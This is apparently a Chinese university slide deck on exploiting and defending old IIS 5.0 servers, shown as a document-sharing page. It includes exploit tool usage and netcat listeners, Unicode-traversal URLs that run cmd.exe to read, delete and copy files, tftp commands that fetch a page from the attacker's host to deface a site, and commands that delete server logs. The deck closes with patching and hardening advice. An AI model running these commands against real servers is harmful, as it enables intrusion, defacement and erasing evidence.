收藏
下载资源

基于漏洞的入侵及其防范之二

上传人:bin****86 文档编号:56223233 上传时间:2018-10-10 格式:PPT 页数:28 大小:466.50KB
返回 下载 相关 举报
基于漏洞的入侵及其防范之二_第1页
第1页 / 共28页
基于漏洞的入侵及其防范之二_第2页
第2页 / 共28页
基于漏洞的入侵及其防范之二_第3页
第3页 / 共28页
基于漏洞的入侵及其防范之二_第4页
第4页 / 共28页
基于漏洞的入侵及其防范之二_第5页
第5页 / 共28页
点击查看更多>>
资源描述

《基于漏洞的入侵及其防范之二》由会员分享,可在线阅读,更多相关《基于漏洞的入侵及其防范之二(28页珍藏版)》请在金锄头文库上搜索。

1、2018/10/10,1,IIS中的漏洞利用与防范,IIS中的漏洞,2018/10/10,2,IIS5.0是Windows 2000中附带的Web服务器,功能很强大,但是漏洞也比较多。据说,现在已经发现了IIS5.0的一千多个漏洞。也许更多的还没有被发现。,2018/10/10,3,Windows 2000中的Internet 信息服务,2018/10/10,4,IIS常见漏洞,.IDA&.IDQ漏洞 Printer漏洞 Unicode漏洞 .asp映射分块编码漏洞 Webdav漏洞,2018/10/10,5,漏洞的原因:ida和idq是iis中用来提供索引服务的一种文件。如果在Web服务器中

2、存在这种文件,那么客户可以从浏览器中请求这种文件进行数据查询。Iis会把客户的请求转给一个名为idq.dll的动态连接库进行处理 Idq.dll文件中存在一个缓冲区溢出漏洞。当超过指定长度的请求被传进来的时候,服务器会出错。如果该请求被黑客精心构造(这种请求数据称为shellcode),服务器会执行请求数据中的程序代码。成功利用该漏洞,可以以管理员的身份运行Shellcode,进行可能完全控制该服务器。,ida.&.idq漏洞,2018/10/10,6,一个ida&idq漏洞的攻击工具,2018/10/10,9,.printer漏洞的利用,使用工具:IIS5.Printer Exploit进行

3、漏洞利用 入侵过程: 在本地用NC打开一个监听端口:nc l p 250 用“IIS5Exploit 目标IP 本地IP 250” 命令对远程主机进行漏洞溢出 在获得远程主机的命令窗口后,可建立账号,2018/10/10,10,Unicode目录遍历漏洞(教材P143),Unicode 目录遍历也是IIS上一个著名的漏洞 Nimda(尼姆达)病毒利用了该病毒进行传播SP2和之前的版本中存在 借助于该漏洞,可以访问与Web根目录在同一个驱动器上的文件。如果该驱动器是安装系统的驱动器,则可以访问cmd.exe,并可以以 IUSR_machinename (这里的machinename是机器名,该帐

4、号在安装IIS的时候自动建立)的身份运行命令,2018/10/10,11,利用该漏洞,一般不能直接获取服务器的管理员权限,但是一般可以修改Web服务器上的网页内容,获得网站的控制权。 配合Windows和IIS的其他漏洞,一般可以得到系统管理员的权限 利用该漏洞,可以在IE中执行远程命令,2018/10/10,12,漏洞的探查,可以使用XScan进行扫描,也可以手工测试 在Windows中,表示上层目录,所以在命令中可以使用 表示上层的上层。但在iis中如果直接输入 将被过滤掉。但是编程人员犯了一个错误,可以使用 unicode字符(如%c1%1c)表示”/”,而这样并不会被过滤,因而可以正常

5、访问。,2018/10/10,13,利用Unicode漏洞操作目标主机文件,1.显示文件内容如果想显示目标主机里面的一个名为lucky.txt文本文件,输人下面这行命令即可(要显示htm, asp, bat等文件都用同样的方法):http:/216.246.X.X/scripts/%c1%1c/winnt/ system32/cmd.exe?/c+type+c:lucky.txt这样该文件的内容就可以通过IE显示出来。 2.删除文件输入如下命令,即可删除主机上lucky.txt文件:http:/216.246.X.X/scripts/%c1%1c/winnt/ system32/cmd.exe

6、?/c+del+c:lucky.tx,2018/10/10,14,3.copy文件的同时将该文件改名输入如下命令,即可将主机上的lucky.txt改名为luck.txt: http:/216.246.X.X/scripts/%c1%1c/winnt/ system32/cmd.exe?/c+copy+c:lucky.txt luck.txt 4.COPY文件到另外的文件夹输入如下命令,就可以主机上的c:lucky文件夹下的文件全部copy到c:inetpubwwwroot下了:http:/216.246.X.X/scripts/%c1%1c/winnt/system32/cmd.exe?/c+

7、xcopyc:luckyc:inetpubwwwroot,2018/10/10,15,attrib命令使用示例,运行下面的命令,可以看到目标主机C:inetpubwwwroot下的index.htm文件的属性: http:/216.246.X.X/scripts/%c1%1c/winnt/system32/attrib.exe?c:inetpubwwwrootindex.htm 运行下面的命令,把目标主机c:inetpubwwwroot下的index.htm文件设为只读、隐藏属性: http:/216.246.X.X/scripts/%c1%1c/winnt/system32/attrib.e

8、xe?%20%2br%20%2bh%20c:inetpubwwwrootindex.htm 运行下面的命令可以解除文件的属性: http:/216.246.X.X/scripts/%c1%1c/winnt/system32/attrib.exe?%20-r%20-h%20c:inetpubwwwrootindex.htm,说明:这里“%2b“等同于“+“,2018/10/10,16,Unicode漏洞利用,入侵者将具有IUSR_machinename权限,只能进行简单的文件类操作,但对网站来说,这些也是致命的。 漏洞利用的著名例子:网站被“黑”。 实现过程: STEP1:准备自己的页面,改名(

9、如a.htm); STEP2:探知WEB根目录。两种方法。一是利用IDA&IDQ漏洞;二是使用文件查找法(如mmc.gif),在IE中输入:http:/IP/scripts/%c1%1c/winnt/system32/cmd.exe?/c+dir+c:mmc.gif/s STEP3:探知主页文件名。在IE栏中输入:dir+c:Inetpubwwwroot ,可知主页文件是哪个(如index.htm)。 STEP4:用TFTP服务器软件更换主页。方法:把个人页面拷贝到TFTP服务器路径下,然后用WINDOWS自带的TFTP命令进行主页更改。即在IE中把前面命令中从“?”后面开始换成如下命令:/C

10、+tftp+本机IP+get+a.htm+c:inetpubwwwrootindex.htm 结果:再次登录该网站时看到的是你的a.htm页面。,2018/10/10,17,补充:TFTP命令学习,Tftpd32.exe可以网上下载(tools中也可找到),解压之后即可用。运行该程序之后,本机即成为一台小小FTP服务器。利用Windows自带的TFTP命令可以进行文件的上传下载。 使用命令:TFTP -i host get/put source 目的地 参数说明:-I 二进制文件传输;GET 下载;PUT 上传;SOURCE 文件名。 例: http:/IP/scripts/%c1%1c/wi

11、nnt/system32/cmd.exe?/c+tftp+192.168.245.1+get+1.htm+c:inetpubwwwrootindex.htm” 功能:从192.168.254.1主机中下载1.htm文件并用它来替换IP主机上的“c:inetpubwwwrootindex.htm”文件,2018/10/10,18,补充:擦脚印,在客户端IE中依次使用如下命令来清除对方服务器上的日志文件: Del+c:winntsystem32logfiles*.* Del+c:winntsystem32config*.evt Del+c:winntsystem32dtclog*.* Del+c:

12、winntsystem32*.log Del+c:winntsystem32*.txt Del+c:winnt*.txt Del+c:winnt*.log,2018/10/10,19,补充:利用UNICODE漏洞获得系统权限,思路:添加IDQ漏洞;使用ISPC与远程服务器连接;添加管理员账号;断开连接 步骤: 把IDQ.DLL拷贝到远程服务器:使用命令“tftp+IP+get+idq.dll+c:InetpubScriptsidq.dll” 使用ISPC与该服务器实现连接:在本地CMD中输入“ispc IP/scripts/idq.dll”进行连接,可以得到远程的CMD窗口 添加管理员账号:略

13、 断开连接:EXIT,2018/10/10,20,WebDAV(Web-based Distributed Authoring and Versioning 分布式创作和版本控制)远程缓冲区溢出漏洞,检测:WebDAVScan 利用:使用工具WebDAVx3(对中文版IIS5.0) 过程: 扫描漏洞(webdavscan) 溢出:在CMD窗口下输入webdavx3 IP 登录:用telnet或nc(端口为7788) 效果:远程控制;DoS(拒绝服务攻击),2018/10/10,21,其它常见漏洞,论坛漏洞 上传漏洞 暴库漏洞(在错误信息中显示数据库的物理路径) BLOG漏洞 直接下载数据库漏洞

14、 COOKIE漏洞(欺骗漏洞),2018/10/10,22,针对网络漏洞的防范措施,2018/10/10,23,* 正确的安全意识,机密的数据-不要直接连接到Internet上 建立一个较完备的备份策略,2018/10/10,24,* 安装最新的服务包,Windows 2000 -SP4 Windows XP -SP2 Windows 的服务包包含一定时期的已经发现的安全漏洞更新。 在服务包发布之后,如果有新的安全漏洞被发现,会以“安全补丁”的形式推出,2018/10/10,25,* 安装安全更新,及时安装系统最新的安全补丁。一般上,可以设置为“自动更新” 经常访问“微软安全公告”,地址为 访

15、问一些正规的安全站点(如),了解最新的安全漏洞。但是要避免访问一些不正规的黑客站点,因为有些黑客站点往往就会利用客户的漏洞进行破坏或者在下载的黑客软件中放入有害程序,2018/10/10,26,关闭不必要的服务和功能,关闭不必要的网络服务 对于个人计算机来说,可以关闭所有的网络服务 对于网络服务器,仅仅开启必要的网络服务 关闭服务中不必要的功能 如IIS中,如果是静态网站,不要给网站虚拟目录“执行”、“运行脚本”的权限 如果要开启asp功能,在开启“运行脚本”后,删除所有除了“asp, asa”之外的扩展名影射,删除所有过滤器,2018/10/10,27,安装网络防火墙,在防火墙上仅仅开放必要

16、的网络端口,增加网络入侵的难度 Windows xp sp2和Windows 2003自带了网络防火墙,因此可以打开,增强安全性,2018/10/10,28,调查,到目前(2009年3月),Windows 2000的最新服务包是_,Windows XP的最新服务包是_,Windows 2003的最新服务包是_ 微软公司(Microsoft)通过“ _公告”来发布Windows等微软产品中存在的安全漏洞。请查询2005年1月发布的安全问题,他们的编号分别是_ 简要说明telnet协议,http协议,ftp协议的主要功能和它们使用的默认端口分别是什么 查询:ida&idq漏洞在微软安全公告中的漏洞编号是什么?严重程度如何?引起该漏洞的模块名是什么?(dll文件名),

展开阅读全文
相关资源
相关搜索

当前位置:首页 > 办公文档 > PPT模板库 > 其它

电脑版 |金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号